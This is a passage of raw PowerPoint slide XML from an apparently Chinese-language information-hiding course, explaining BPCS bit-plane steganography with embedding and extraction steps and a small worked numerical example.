              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>112</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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：复杂度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相间棋盘状</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：复杂度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>112</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>复杂度为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的图像块，与棋盘状图像块做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>异或运算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>后，生成的新图像块，复杂度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cmax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>图像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>块与棋盘状图像块的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>异或操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，称之为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>共轭处理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15" y="3281363"/>
            <a:ext cx="16573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6514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 bldLvl="5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79550" y="1981200"/>
            <a:ext cx="7626350" cy="48768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BPCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>算法信息嵌入步骤：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将载体图像所有位平面分为小块，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>8×8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计算每个小块的复杂度；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>选择复杂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cmax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的位平面小块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用于负载秘密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>信息；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 smtClean="0">
                <a:latin typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>秘密信息组成位平面小块，如果其复杂度大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Cmax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>直接替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>原位平面小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>块；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如果其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>复杂度小于等于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Cmax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则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>先作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>共轭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，再替换；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下哪些小块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>经过共轭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>处理。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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452042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bldLvl="5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79550" y="1981200"/>
            <a:ext cx="7626350" cy="48768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BPCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>算法信息提取步骤：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将载体图像所有位平面分为小块，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>8×8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计算每个小块的复杂度；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>选择所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>复杂度大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aCmax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的位平面小块取出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，可得到含共轭处理的秘密信息；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 smtClean="0"/>
              <a:t>根据共轭处理记录，对于作过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>共轭处理的小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>块，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>作一次共轭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，就可以得到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秘密信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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870119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bldLvl="5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BPCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>案例：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设分块大小为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2*2,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>每像素值用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>比特表示，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>alpha=0.4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Cmax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为多少？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、若已知小块像素（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>优先排列）为（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>7,5,4,6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>），其各个比特平面的复杂度为？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、有哪些比特平面适于隐藏信息？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/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260602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BPCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>案例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解：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin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</a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cmax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>=4,alpha = 0.4,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>alpha * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cmax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = 0.4 * 4 = 1.6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88841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BPCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>案例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解：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2~3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>、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像素为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>7,5  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>即： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>111 101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>            4,6           100 110</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>三个比特平面，按位权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</a:rPr>
              <a:t>低高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>分别为：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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</a:rPr>
              <a:t>  最低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>比特（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1 1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  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1 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>最高比特</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty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itchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>      平面    （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0 0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  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0 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）    平面    （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1 1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其复杂度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，因此可以隐藏秘密信息的是最低和次低比特平面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78621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  <a:endParaRPr lang="zh-CN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BPCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>案例：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设秘密信息为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1 1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1 0        0 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>则隐藏秘密信息后，上述像素值变为？约定先替换位权较低的比特平面。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7777768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BPCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>案例，解：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>则第一块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>复杂度为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，大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>alpha*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Cmax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>                1 0 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可以直接替换，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第二块要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>复杂度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>alpha*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Cmax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               0 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>应与棋盘小块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>异或，得：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>                        0 1                    0 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
              <a:latin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40559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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 时域替换技术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BPCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>案例：解：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>后，三个比特平面，从低到高分别为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1 1 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 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1 0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 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</a:p>
          <a:p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1 0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  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0 1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin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</a:rPr>
              <a:t>还原为十进制值为：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</a:rPr>
              <a:t>7 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5 6</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
              <a:latin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16950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课程内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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格式信息隐藏算法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时域算法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变换域算法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扩频算法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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>统计算法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BMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>格式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171" name="Picture 109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513" y="4191000"/>
            <a:ext cx="4452938" cy="0"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Rectangle 1095"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3175" y="6556375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kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000">
